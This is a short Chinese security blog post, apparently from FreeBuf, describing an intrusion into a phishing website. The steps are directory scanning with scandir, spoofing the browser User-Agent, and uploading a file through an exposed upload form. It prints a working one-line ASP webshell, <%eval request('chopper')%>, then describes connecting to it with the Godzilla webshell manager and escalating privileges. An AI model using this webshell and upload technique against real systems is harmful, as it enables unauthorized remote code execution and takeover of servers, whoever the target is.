scandir信息收集

我们利用scandir 对钓鱼网站进行扫描

发现一个文件上传的入口，我们可以利用他进行上传webshell

绕UA信息

访问这个网站，发现这个小可爱骗骗还搞个个电脑访问

利用谷歌自带的工具 修改UA信息

可以看到这个是非常一个经典的钓鱼网站，一般人们通过填写个人信息，银行卡钱就无了。

编写一句话asp

一句话asp地址

访问我们刚刚发现的 sn.asp ，显而易见这个是一个java写的，我尝试写一个asp马

<%eval request("chopper")%>

文件上传

重命名文件为 asp 后缀文件，然后，上传。

之后访问IP/xx.asp文件

哥斯拉

利用我们的哥斯拉进行连接

哥斯拉那边运行一下

之后就可以像我这样上线提权了

本文作者：keyoldk， 转载请注明来自FreeBuf.COM